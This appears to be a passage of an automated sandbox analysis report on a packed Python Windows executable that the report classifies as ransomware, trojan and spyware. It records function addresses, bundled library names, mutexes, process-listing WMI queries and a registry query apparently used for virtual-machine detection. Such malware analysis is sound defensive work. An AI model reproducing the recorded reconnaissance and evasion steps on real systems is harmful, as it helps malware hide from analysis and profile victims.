              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1AB018C07_2_00007FFB1AB018C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1AB011A07_2_00007FFB1AB011A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1B6F530C7_2_00007FFB1B6F530C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1B6F32A07_2_00007FFB1B6F32A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1B712E607_2_00007FFB1B712E60
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BA571A07_2_00007FFB1BA571A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BA410C07_2_00007FFB1BA410C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BA43B207_2_00007FFB1BA43B20
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BB160907_2_00007FFB1BB16090
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BB13B507_2_00007FFB1BB13B50
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BB13DF07_2_00007FFB1BB13DF0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BB110007_2_00007FFB1BB11000
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BB12DB07_2_00007FFB1BB12DB0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BB1C8D87_2_00007FFB1BB1C8D8
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1C2583007_2_00007FFB1C258300
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1C2563A07_2_00007FFB1C2563A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1D34AC307_2_00007FFB1D34AC30
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1D5BAA407_2_00007FFB1D5BAA40
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAA9C5302720_2_00007FFAA9C53027
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A0A2C97_2_00007FF7080A0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C7B2497_2_00007FF7080C7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809ABA097_2_00007FF70809ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080BAE1097_2_00007FF7080BAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A118097_2_00007FF7080A1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080982F097_2_00007FF7080982F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A54C097_2_00007FF7080A54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809B54097_2_00007FF70809B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809188497_2_00007FF708091884
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CD91C97_2_00007FF7080CD91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080BD97C97_2_00007FF7080BD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080949B897_2_00007FF7080949B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D69FD97_2_00007FF7080D69FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D5A7097_2_00007FF7080D5A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CFA6C97_2_00007FF7080CFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080FAAC097_2_00007FF7080FAAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809CB1497_2_00007FF70809CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D4B3897_2_00007FF7080D4B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E9B9897_2_00007FF7080E9B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A8C3097_2_00007FF7080A8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D5C8C97_2_00007FF7080D5C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E6D0C97_2_00007FF7080E6D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B9D0C97_2_00007FF7080B9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809DD0497_2_00007FF70809DD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C0D2097_2_00007FF7080C0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D9D7497_2_00007FF7080D9D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E1DCC97_2_00007FF7080E1DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809EE0897_2_00007FF70809EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A1E0497_2_00007FF7080A1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080DAE5097_2_00007FF7080DAE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080EFE7497_2_00007FF7080EFE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A8E6897_2_00007FF7080A8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809CE8497_2_00007FF70809CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080DEEA497_2_00007FF7080DEEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CAF0C97_2_00007FF7080CAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF708099EFC97_2_00007FF708099EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C5F4C97_2_00007FF7080C5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080FAF9097_2_00007FF7080FAF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D4FE897_2_00007FF7080D4FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080FDFD897_2_00007FF7080FDFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CC00C97_2_00007FF7080CC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A303097_2_00007FF7080A3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C804097_2_00007FF7080C8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C007497_2_00007FF7080C0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080BC05C97_2_00007FF7080BC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080F00F097_2_00007FF7080F00F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B010497_2_00007FF7080B0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D216497_2_00007FF7080D2164
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D81CC97_2_00007FF7080D81CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080F41CC97_2_00007FF7080F41CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080AE21C97_2_00007FF7080AE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809F24C97_2_00007FF70809F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B724497_2_00007FF7080B7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E226897_2_00007FF7080E2268
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D02A497_2_00007FF7080D02A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080AD2C097_2_00007FF7080AD2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080942E097_2_00007FF7080942E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E131497_2_00007FF7080E1314
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E832C97_2_00007FF7080E832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C037497_2_00007FF7080C0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A236097_2_00007FF7080A2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080BC3E097_2_00007FF7080BC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D546897_2_00007FF7080D5468
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080BD45897_2_00007FF7080BD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809A50497_2_00007FF70809A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080BF5B097_2_00007FF7080BF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CF59C97_2_00007FF7080CF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A859897_2_00007FF7080A8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E260C97_2_00007FF7080E260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C65FC97_2_00007FF7080C65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E766097_2_00007FF7080E7660
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080F86D497_2_00007FF7080F86D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A86C497_2_00007FF7080A86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CA71097_2_00007FF7080CA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D071097_2_00007FF7080D0710
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D270097_2_00007FF7080D2700
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A17C897_2_00007FF7080A17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B67E097_2_00007FF7080B67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A289097_2_00007FF7080A2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809888497_2_00007FF708098884
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E18A897_2_00007FF7080E18A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C38E897_2_00007FF7080C38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D190C97_2_00007FF7080D190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C090497_2_00007FF7080C0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: String function: 00007FF7080D49F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: String function: 00007FF7080A8444 appears 48 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB1BA49570 appears 163 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB0C051E20 appears 33 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB1BA494D8 appears 35 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB1B7012B0 appears 37 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB0C1AF350 appears 67 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB1B701250 appears 42 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FF7C2662910 appears 34 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB0C1AF4E8 appears 79 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB0C02A500 appears 163 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB0C029340 appears 135 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB1B701630 appears 84 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FF7C2662710 appears 104 times
              Source: X9g8L63QGs.exeStatic PE information: invalid certificate
              Source: rar.exe.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: X9g8L63QGs.exeBinary or memory string: OriginalFilename vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000000.1270283725.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameksetup.exej% vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1270486310.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exeBinary or memory string: OriginalFilename vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1711105405.00007FFB0B9C9000.00000004.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000000.1276917721.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameksetup.exej% vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1711482875.00007FFB0BA99000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibsslH vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1714669016.00007FFB167BB000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1712549719.00007FFB0BFAA000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1716259793.00007FFB1D5BC000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1714389056.00007FFB0C8E4000.00000004.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1712826899.00007FFB0C012000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1716057701.00007FFB1D34C000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exe, 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs X9g8L63QGs.exe
              Source: X9g8L63QGs.exeBinary or memory string: OriginalFilenameksetup.exej% vs X9g8L63QGs.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python312.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.99938957658917
              Source: sqlite3.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9979301292407108
              Source: unicodedata.pyd.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9948079718246869
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@176/56@4/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080ACAFC GetLastError,FormatMessageW,97_2_00007FF7080ACAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080AEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,97_2_00007FF7080AEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080DB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,97_2_00007FF7080DB57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B3144 GetDiskFreeSpaceExW,97_2_00007FF7080B3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2864:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4332:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1912:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile created: C:\Users\user~1\AppData\Local\Temp\_MEI33962Jump to behavior
              Source: X9g8L63QGs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
